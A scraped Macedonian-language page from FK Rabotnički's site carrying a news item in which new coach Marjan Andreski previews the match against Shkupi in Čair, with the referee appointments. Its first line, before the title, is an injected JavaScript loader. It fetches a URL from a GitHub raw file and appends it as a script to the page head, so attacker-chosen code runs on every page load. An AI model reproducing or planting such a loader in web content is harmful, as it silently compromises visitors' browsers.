;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Андрески: Работнички не заслужува да биде на дното, да тргнеме напред уште од Чаир
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Андрески: Работнички не заслужува да биде на дното, да тргнеме напред уште од Чаир

Работнички утре (14.30 часот) ќе му гостува на Шкупи во Чаир, а новиот тренер Марјан Андрески ќе гима дебито како шеф на стручниот штаб. По поразот од Струга Трим Лум, Александар Влахо понуди оставка која беше прифатена од раководството, а промената на клупата треба да претставува еден вид шок-терапија за фудбалерите.

Андрески верува дека Работнички утре ќе се претстави во многу подобро издание на дуелот со Шкупи.

„Работнички не заслужува да биде на дното и треба сите максимално да се потрудиме што е можно побрзо да излеземе од резултатската криза. Имаме квалитет, можеби на одредени мечеви и среќата не беше на наша страна, но мораме да смогнеме сили, да заиграме подобро и да бележиме позитивни резултати во серија. Верувам дека уште утре тимот ќе покаже многу повеќе“, вели новиот шеф на стручниот штаб, Марјан Андрески.

Главен судија на утрешниот натпревар ќе биде Марјан Гоцевски, а ќе му помагаат Ѓорѓи Станковски и Кире Ангеловски. Четврти судија ќе биде Ристе Сејменов (сите од Струмица). За делегат на мечот е одреден Кочо Зердески (Кичево), а контролор на судењето ќе биде Ванчо Костенчев (Скопје).